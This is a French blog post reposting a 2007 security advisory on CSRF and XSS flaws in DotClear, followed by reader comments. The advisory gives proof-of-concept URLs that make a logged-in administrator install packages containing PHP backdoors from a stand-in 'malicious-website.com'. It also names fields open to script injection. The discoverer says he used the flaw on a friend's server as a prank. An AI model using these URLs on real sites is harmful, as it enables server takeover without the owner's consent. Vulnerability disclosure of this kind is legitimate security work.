[ALERTE] Faille DotClear
SckyzO | 11 juillet 2007 | 12:34Source : http://ar3av.free.fr/faille-dotclear.php
Bulletin de sécurité
http://ar3av.free.fr/faille-dotclear.php
=======================================
Software: DotClear
Date: 08 Juillet 2007
Versions affectées: 1.2.6 et versions antérieures / 2.0 beta 6 et versions antérieures
Type de la faille: CSRF & XSS
Découvreur: PsychoGun
DotClear est un blog populaire écrit en PHP dans lequel j’ai découvert de nombreuses vulnérabilités. Cette application web offre à son administrateur une interface de gestion qui permet de le configurer, mais le problème réside dans le fait que cette interface ne respecte pas les conventions rudimentaires de sécurité. Ainsi le blog ne vérifie jamais correctement la provenance des données qui lui sont envoyées, et c’est pourquoi il est possible de faire accomplir des actions à l’administrateur sans son consentement.
Pour peu qu’il soit logué sur son compte, on peut faire supprimer, activer ou désactiver des plugins à l’administrateur. On peut aussi lui faire ajouter des plugins infectés par des backdoor écrites en php et prendre, de cette manière, le contrôle du serveur. A noter que le plugin qui permet d’en ajouter d’autres fait partie de la configuration minimale de DotClear. J’ai déjà exploité cette faille pour faire une plaisanterie à un ami. Son site était composé d’un blog et d’un forum. J’ai posté une fausse image sur son forum qui réalisait une re-direction vers une url de ce type:
http://victim.com/dotclear/ecrire/tools.php?tool_url=http://www.malicious-website.com/malicious-file.pkg.gz&p=toolsmng
Sans le savoir, en ne cliquant sur aucun lien et en visualisant une page de son propre site, l’administrateur à installé une backdoor écrite en php sur son serveur. J’avais donc obtenu le contrôle de ce serveur grâce à une vulnérabilité de DotClear aussi stupéfiante que facile à exploiter. Mon fichier “malicious-file.pkg.gz” a été produit avec un outil de DotClear et il contenait des fichiers php qui ont donc été placés sur le serveur. Il ne devrait pas être possible de faire ce genre de choses, et c’est parce que DotClear n’utilise pas un système de token qu’il est vulnérable. Cette faille est présente partout ailleurs sur le blog.
On retrouve cette même faille dans la partie du blog sui sert à gérer les thèmes. Encore une fois on peut faire supprimer, activer ou désactiver des thèmes à l’administrateur. On peut aussi lui faire ajouter de nouveaux thèmes contenant des fichier php qui serviraient de backdoor. Voici un proof of concept :
http://victim.com/dotclear/ecrire/tools.php?tool_url=http://www.malicious-website.com/evil.pkg.gz&p=thememng
Lorsque l’administrateur clique sur ce lien ou lorsqu’il qu’il visualise une page web(qui peut être la sienne) qui contient ce lien(dans une image ou une iframe par exemple), les backdoors écrites en php sont alors copiés sur le serveur visé.
On peut faire mettre n’importe quoi à l’administrateur dans les champs de cette page:
http://victim.com/dotclear/ecrire/tools.php?p=blogconf
parce qu’encore une fois le blog ne vérifie pas la provenance des données, par ailleurs le champs contenant le nom du blog peut recevoir du code Javascript et peut par conséquent être utilisé pour mener à bien des attaques de type cross site scripting.
Sur cette page:
http://victim.com/dotclear/ecrire/tools.php?p=blogroll
On peut faire placer des nouveaux liens ou des nouvelles rubriques à l’administrateur. On peut aussi lui faire effacer des liens ou des rubriques. Cette page présente aussi une faille Xss car on peut placer du code javascript dans ses champs et celui-ci est à chaque fois interprété (dans la partie admin). Le javascript inséré dans le champs “rubrique” est lui aussi interprété sur la 1ère la page du blog(page visible pour tout le monde).
Il est très facile de faire créer à l’administrateur des profiles d’utilisateurs ayant les mêmes pouvoirs que lui. Il suffit de lui faire visiter une page qui contient un code HTML similaire à celui-ci:
============================
Lire la suite de l’article et des astuces sur le site officiel à la demande de l’auteur : http://ar3av.free.fr/faille-dotclear.php
Aucun tag pour cet article.
Sécuriser l'interface d'administration de dotclear... Voici une petite astuce trouvée sur
Tux-planet | 11 juillet 2007 | 13:39Sécuriser l’interface d’administration de dotclear…
Voici une petite astuce trouvée sur le blog officiel de dotclear, qui consiste à changer le nom du dossier d’administration afin de se prémunir d’éventuelles attaques….
D'où mon récent billet sur comment sécuriser l'interface d'administration de
Pti-seb | 11 juillet 2007 | 13:43D’où mon récent billet sur comment sécuriser l’interface d’administration de dotclear :
http://www.tux-planet.fr/blog/?2007/07/10/166-securiser-l-interface-d-administration-de-dotclear
Edit du 10/07/2007(18H20): Les responsables du projet DotClear ont émis
SckyzO | 11 juillet 2007 | 13:47Edit du 10/07/2007(18H20): Les responsables du projet DotClear ont émis un article dans lequel ils affirment que le fait de renommer des répertoires met les utilisateurs à l’abri de probables attaques. Sachez que cette allégation est absolument fausse. Le mieux reste, par conséquent, de s’en tenir à la recommandation faite ci-dessus.
Je comprend pas tout mais c'est dingue ce truc. Comment
eon | 11 juillet 2007 | 13:59Je comprend pas tout mais c’est dingue ce truc. Comment un code que je visualise pourrait corrompre le système? les plugins en php ne peuvent pas remonter jusqu’à l’admin du serveur tout de meme?
Enfin, il doit avoir raison surement, j’y connais rien.
C'est l'exploitation de faille php dans un code mal fait
SckyzO | 11 juillet 2007 | 14:33C’est l’exploitation de faille php dans un code mal fait
Tout simplement, comme il en existe pour WP ou autre CMS, car au fond, c’est pas que c’est mal fait, c’est qu’il y a tellement de code qui traine que forcement, tout n’est pas parfait !
Salut SckyzO, Je suis l’auteur de l’article qui a été copié/collé
JoeGuillian | 14 juillet 2007 | 20:39Salut SckyzO,
Je suis l’auteur de l’article qui a été copié/collé ci-dessus.
Veux tu bien ne citer qu’une partie de mon article et mettre un lien vers mon site pour que les gens puissent y lire la suite plutôt que de le reprendre dans son intégralité … ?
Voila :) Ca te va comme ca ? crdlt SckyzO
SckyzO | 16 juillet 2007 | 13:39Voila
Ca te va comme ca ?
crdlt
SckyzO
je pense que skyzo se fiche de toi, Joe. hahahahhaah
xss666 | 18 juillet 2007 | 21:52je pense que skyzo se fiche de toi, Joe.
hahahahhaah
Absolument pas, sinon je demanderai pas !! Et si ca va
SckyzO | 20 juillet 2007 | 0:40Absolument pas, sinon je demanderai pas !!
Et si ca va pas, qu’on me le dise ! I am Very Open
ça craind tout de meme ces failles !
horaires SNCF | 7 août 2007 | 20:15ça craind tout de meme ces failles !